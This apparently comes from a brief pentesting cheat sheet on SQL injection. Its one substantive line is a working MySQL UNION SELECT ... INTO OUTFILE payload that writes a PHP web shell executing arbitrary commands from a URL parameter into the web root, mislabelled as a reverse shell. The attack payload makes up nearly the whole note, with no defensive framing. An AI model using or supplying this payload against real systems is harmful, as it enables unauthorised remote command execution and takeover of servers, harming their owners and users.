Sql Injection

Enumeration Steps

we can have a quick php rev shell using the INTO OUTFILE command in MySQL.

' UNION SELECT '<?php echo system($_GET["cmd"]);' INTO OUTFILE '/srv/http/cmd.php'; -- -